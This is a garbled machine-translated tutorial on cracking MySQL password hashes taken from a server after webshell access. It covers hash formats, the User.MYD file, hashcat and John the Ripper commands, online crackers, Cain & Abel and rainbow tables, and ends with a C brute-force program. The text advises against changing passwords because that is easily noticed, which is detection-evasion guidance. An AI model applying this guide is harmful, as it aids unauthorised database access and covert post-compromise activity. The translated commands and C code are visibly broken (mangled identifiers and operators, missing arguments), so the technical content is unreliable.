MySQL as a popular open-source database management system is widely used in various scenarios, Alibaba Cloud provides high available ApsaraDB RDS for MySQL with enhanced MySQL service is now supporting businesses fighting Coronavirus COVID-19.
It is of great significance to study the encryption and decryption of MySQL database in the course of network attack and defense. Imagine that once you have access to the site's permissions, if you can get the data stored in MySQL, through the decryption, you can access the database through the normal way, on the one hand, the direct operation of data in the database, On the other hand can be used to elevate permissions. In this paper, the common methods of MySQL password cracking are studied and discussed.
1.MySQL Database Password hack
MySQL database user password is the same as other database user password, in the application system code is in clear text appears, after obtaining the file Read permission can be directly read from the database connection file, For example, the ASP code in the Conn.asp database connection file, which generally contains the database type, physical location, user name and password information, and in MySQL, even if the database user (the root user except) to obtain a password, only one user's database can only operate data.
In the actual attack and defense process, in the case of acquiring Webshell, It is possible to download the MySQL database to keep the user's User.myd
file, the file is stored in the MySQL database for all users of the database password, as long as the ability to crack these passwords can be fair and square operation of these data, although there are many online to modify the MySQL database user password method, but not advisable, because the repair Change the user password thing is easy to be found!
1.1MYSQL Encryption method
MySQL Database authentication password There are two ways, MySQL 4.1 version is MYSQL323 encryption, MySQL 4.1 and later versions are MYSQLSHA1 encryption, MySQL database comes with old_ Password (str) and Password (str) functions, which can be queried in the MySQL database, the former is MYSQL323 encryption, the latter is MYSQLSHA1 mode encryption.
(1) Encrypt in MYSQL323 mode
Selectold_password (& #39;bbs.antian365.com& #39;);
Query Results mysql323= 10c886615b135b38
(2) Encrypt in MYSQLSHA1 mode
Selectpassword (& #39;bbs.antian365.com& #39;);
Query Results mysqlsha1= *A2EBAE36132928537ADA8E6D1F7C5C5886713CC2
As shown in result 1, the MYSQL323 encryption generates a 16-bit string, whereas in MYSQLSHA1 it is a 41-bit string, where * is not added to the actual cryptographic operation, by observing that many users are carrying "*", in the actual cracking process to remove the "*", That is to say, the actual number of MYSQLSHA1 encrypted passwords is 40 bits.
Figure 1 in MySQL different sha for querying the same password in the database value
1.2MYSQL Database File Structure
1.MYSQL Database File types
MySQL database files have "frm", "MYD" "and myi" three kinds of files, ". frm" is a file that describes the structure of the table, ". MYD "is the data file for the table,". MYI "is the data tree of any index in the table data file. Typically there is a single folder, and the default is under the path "C:\Program files\mysql\mysql Server 5.0\data".
2.MYSQL Database user password file
All settings in the MYSQL database are saved by default in "C:\Program files\mysql\mysql Server 5.0\data\mysql", which is the data directory of the installer, as shown in 2, A total of three files for the user are user.frm, user. The MyD and User.myi,mysql database user passwords are stored in the User.myd file, including the root user and other user passwords.
Figure 2 MYSQL Database user password file
1.3 Get MySQL Password hash value
1. Get the MySQL database user password encryption string
Open the User.myd file directly using the ULTRAEDIT-32 editor, open it using binary mode for viewing, 3, you can see that after the root user is a string of strings, select the strings to copy them into Notepad, these strings are user encrypted values, that is, the 506D1427F6F61696B45 01445c90624897266dae3. Attention:
(1) "*" After Root is not copied to the string.
(2) In some cases, you need to look back, otherwise you will not get the full MYSQLSHA1 password, in short, the correct number of passwords is 40 bits.
(3) If you are password cracking in John Theripper password cracker, you need to bring "*"!
Gets the encrypted string
1.4 Website online password hack
1.ww.cmd5.com cracked. Will get the MySQL value in the cmd5.com Web site for query, MySQL password cracking is generally charged, successfully cracked a 0.1 yuan.
2.somd5.com cracked. Somd5.com is a free cracked web site behind, each time the hack needs to manually select the graphics code to crack, fast, good results, only one at a time, and the need to re-enter the verification code after a break.
1.5 hashcat hack Hashcat support a lot of crack algorithms, free open source software, the official website https://hashcat.net/hashcat/, crack command:
hashcat64.exe-m myql.hashpass.dict// cracked MySQL323 type
hashcat64.exe-m myql.hashpass.dict// cracked MYSQL4.1/MYSQL5 type
1.6 John the Ripper password hack John the Ripper:http://www.openwall.com/john/h/john179w2.zip, John Theripper In addition to the ability to crack Linux, but also to crack various forms of password, Under Kali test cracked MySQL password, 4 shown.
Echo*81f5e21e35407d884a6cd4a731aebfb6af209e1b>hashes.txt
John–format =MYSQL-SHA1 Hashes.txt
John–list=formats | grep MySQL//view algorithms that support MySQL password cracking
Figure 4 test mysql password hack
1.7 using Cain to hack MySQL password
1. Add the MySQL user password string to the Cain hack list
using Cain & Abel to hack mysql database user password,Cain & Abel is a hack screen saver, pwl password, shared password, cache password, remote shared password, SMB password, support for VNC password decoding, Cisco Type-7 password decoding, Base64 password decoding, SQL Server 7.0/2000 password decoding, remote Desktop password decoding, Access database password decoding, Cisco PIX Firewall password decoding, Cisco MD5 decoding, NTLM Session security password decoding, IKE aggressive Mode Pre-shared keys password decoding, dialup password decoding, Remote Desktop password decoding and other comprehensive tools, can also be remotely cracked, can hang dictionary and brute force, its sniffer function is extremely powerful, almost can capture all account password, including FTP, HTTP, IMAP, POP3, SMB, TELNET, VNC, TDS, SMTP, Mskerb5-preauth, MSN, Radius-keys, Radius-users, ICQ, IKE aggressive Mode pre-shared KEYS Authentications and so on.
Cain & Abel is currently the latest version of 4.9.56, software:http://www.oxid.it/downloads/ca_setup.exe. Download Cain & After Abel , install it directly, then run it in Cain & Abel the main interface, click the "Cracker" tab, and then encrypt the user password string "506d1427f6f61696b4501445c90624897266dae3" Add to the Mysqlhashes hack list, 5, click "Add tolist", 6, and copy the string into the hash input box. Username can be entered arbitrarily.
Figure 5 using Cain to hack the MySQL password main interface
Figure 6 adding MySQL hashes
2. Use a dictionary to hack
select the string you just added to crack, then select "Dictionary Attack(dictionary hack)" and select "MYSQL SHA1 hashes" in the popup menutohack, This approach is for MYSQL4.1 later versions, and for MYSQL4.1 Previous Versions select "MYSQL v3.23 hashes" to hack.
Figure 7 Selecting the crack mode
Select Dictionaryattack "(Dictionary Crack)" will appear a window, mainly for the selection of dictionaries,8 , under dictionary Right-click, you can add one or more dictionary files, after the dictionary selection can be in the "options (Options), and then click the Startbutton to crack.
Figure 8MYSQL dictionary hack settings
Description
in the options (option) "In a total of 8 type of method is:
(1 ) capitalize the first letter of the string
(2 ) string Inversion
(3 ) Double string
(4 ) string All lowercase
(5 ) string all uppercase
(6 ) to add a number to the string
(7 ) to rotate the uppercase in each string
(8 ) Add 2 to the string a number
after the successful crack Cain will give you some hints, as follows:
PlainText of user <none> Is DatabasePassWord
Attack stopped!
1 of 1 hashes cracked
indicates that the encrypted password is "DatabasePassWord" . Back to the Cain Hack main window , the cracked password value is automatically added to the "Password" column .
3. Crack Discussion
(1) Dictionary crack and Dictionary strength
Click "Start"-"Programs"-"MySQL"-"MySQL Server5.0"-"mysql command line Client" to open MySQL command lineclient, after entering the password, Enter the following code to reset a new password:
Usemysql
UpdateUser set Password=password ("1977-05-05") where user="root"; Flushprivileges;
In this experiment, the original password was modified to "1977-05-05".
Re-open the C:\ProgramFiles\MYSQL\MYSQL Server 5.0\data\mysql\user using the ULTRAEDIT-32 software again. MYD "Get its new password string" B046bbaf61fe3bb6f60ca99af39f5c2702f00d12 "and then re-select a dictionary, in this case choose the generated birthday dictionary, just select the lowercase string to crack, Quickly get the results of the hack. The actual results show that using Cain to crack the MySQL password, if it is to use a dictionary to crack, then the crack effect is related to the dictionary strength, as long as the password in the dictionary, you will be able to crack.
(2) using rainbow table to crack
in Cain also available in rainbow table hack MySQL , select "Cryptanalysisattack" in the hack mode-"MYSQL SHA1 hashes via Rainbowtables "Yes , in the actual testing process because the SHA Rainbow Table formatprovided on the network is RTI, and The RT is used in the Cain and I will download all the rainbow tables in the file suffix by RTI Modify to RT , and then cracked, prompting the message display is not successful, should be a rainbow table format is not the same, Cain only to acknowledge its own offer.
(3) Hash Calculator
in Cain various hashes are available in the calculation, click the Computer icon button in the main interface to eject the hashes calculator, in the "Text Tohash Enter the original value you want to convert, such as enter 12345678 , click the Calculate "for calculations,as shown in, you can see the values of the hashes .
(4) Create a rainbow table
in Cain the installation directory C:\ProgramFiles\Cain\Winrtgen runs directly in the Winrtgen, this tool is a rainbow table generator, which makes it easy to generate various types of rainbow table values.
(5) Set Rainbow table
Click "Add Table" and select "MYSQLsha1 " in the hash in "Rainbowtable properties" , you can then set Min len, Max len, Index, Chain len, Chain Count , respectively, according to the actual situation. And the value of "N oftables", you only need to set the values for Min Len, Max Len,and N oftables. "N of Tables" is used primarily to test the completeness of the hashes generation, enter different values, and display percentages in the table properties. Try to determine how many tables you need to generate altogether, and then click Benchmarktomake a time estimate,as shown in, clickOK tocomplete the Rainbow Table generation settings.
In the Rainbow Table Builder, Clickstart tocreate a rainbow table, and the status shows the size and progress of the build.
Chart start to create Rainbow table
because the rainbow table generation time is relatively long, there is no search on the network to RT end of MySQL sha1hashes table, so this crack mainly in the dictionary to crack the main, the Rainbow table will be in the crack after all generation, in the case of server permissions are not too strict, through the Webshell the MySQL can be fully the user under. MYD File download to local, as long as the root user password, and then the use of Webshell can do a lot of things, this article through the introduction of the online site, John theRipper, Hashcat solution, Cain to crack MySQL password, for the design of the MySQL password is not too complex , the crack is still relatively easy.
(6) for 16-bit MySQL password (MYSQL323 encryption algorithm) there is a fast way to crack, compile the following program, directly to crack, you can crack 8 digits, characters and other passwords.
How to use:
./mysqlfast6294b50f67eda209
/* This program is public domain. Share and enjoy.
* $ gcc-o2-fomit-frame-pointer Mysqlfast.c-o mysqlfast
* $ mysqlfast 6294b50f67eda209
* hash:6294b50f67eda209
*/
#include <stdio.h>
typedef unsigned long u32;
/* allowable characters in password; 33-126 is printable ASCII */
#define MIN_CHAR 33
#define MAX_CHAR 126
/* Maximum Length of password */
#define Max_len 12
#define MASK 0X7FFFFFFFL
int crack0 (int stop, u32 targ1, u32 targ2, int *pass_ary)
{
int I, C;
U32 D, E, Sum, step, diff, Div, xor1, Xor2, State1, State2;
U32 newstate1, Newstate2, Newstate3;
U32 state1_ary[max_len-2], state2_ary[max_len-2];
U32 xor_ary[max_len-3], step_ary[max_len-3];
i =-1;
sum = 7;
State1_ary[0] = 1345345333L;
State2_ary[0] = 0x12345671l;
while (1) {
while (I < stop) {
i++;
Pass_ary[i] = Min_char;
Step_ary[i] = (State1_ary[i] & 0x3f) + sum;
Xor_ary[i] = Step_ary[i]*min_char + (State1_ary[i] << 8);
sum + = Min_char;
STATE1_ARY[I+1] = State1_ary[i] ^ xor_ary[i];
STATE2_ARY[I+1] = State2_ary[i]
+ ((State2_ary[i] << 8) ^ state1_ary[i+1]);
}
State1 = state1_ary[i+1];
State2 = state2_ary[i+1];
Step = (State1 & 0x3f) + sum;
Xor1 = Step*min_char + (state1 << 8);
Xor2 = (state2 << 8) ^ state1;
for (c = Min_char; c <= Max_char; C + +, Xor1 + = Step) {
Newstate2 = State2 + (xor1 ^ xor2);
newstate1 = state1 ^ Xor1;
Newstate3 = (targ2–newstate2) ^ (Newstate2 << 8);
div = (Newstate1 & 0x3f) + sum + C;
diff = ((newstate3 ^ newstate1) – (newstate1 << 8)) & MASK;
if (diff% div! = 0) Continue;
D = diff/div;
if (d < Min_char | | d > Max_char) continue;
div = (Newstate3 & 0x3f) + sum + C + D;
diff = ((targ1 ^ newstate3) – (Newstate3 << 8)) & MASK;
if (diff% div! = 0) Continue;
e = Diff/div;
if (E < Min_char | | e > Max_char) continue;
PASS_ARY[I+1] = c;
PASS_ARY[I+2] = D;
PASS_ARY[I+3] = e;
return 1;
}
while (i >= 0 && pass_ary[i] >= Max_char) {
Sum-= Max_char;
I –
}
if (I < 0) break;
pass_ary[i]++;
Xor_ary[i] + = Step_ary[i];
sum++;
STATE1_ARY[I+1] = State1_ary[i] ^ xor_ary[i];
STATE2_ARY[I+1] = State2_ary[i]
+ ((State2_ary[i] << 8) ^ state1_ary[i+1]);
}
return 0;
}
void crack (char *hash)
{
int I, Len;
U32 targ1, Targ2, TARG3;
int Pass[max_len];
if (sscanf (hash, "%8lx%lx", &TARG1, &targ2)! = 2) {
printf ("invalid password hash:%s\n", hash);
Return
}
printf (" Hash:%08lx%08lx\n", Targ1, TARG2);
TARG3 = TARG2–TARG1;
TARG3 = targ2– ((targ3 << 8) ^ targ1);
TARG3 = targ2– ((targ3 << 8) ^ targ1);
TARG3 = targ2– ((targ3 << 8) ^ targ1);
for (len = 3; Len <= Max_len; len++) {
printf (" Trying length%d\n" len);
if (Crack0 (len-4, Targ1, TARG3, pass)) {
printf (" Found Pass: ");
for (i = 0; i < len; i++)
Putchar (Pass[i]);
Putchar (& #39;\n& #39;);
Break
}
}
if (Len > Max_len)
printf (" Pass not found\n");
}
int main (int argc, char *argv[])
{
int i;
if (argc <= 1)
printf ("usage:%s hash\n", argv[0]);
for (i = 1; i < argc; i++)
Crack (Argv[i]);
return 0;
}
MySQL Database password hack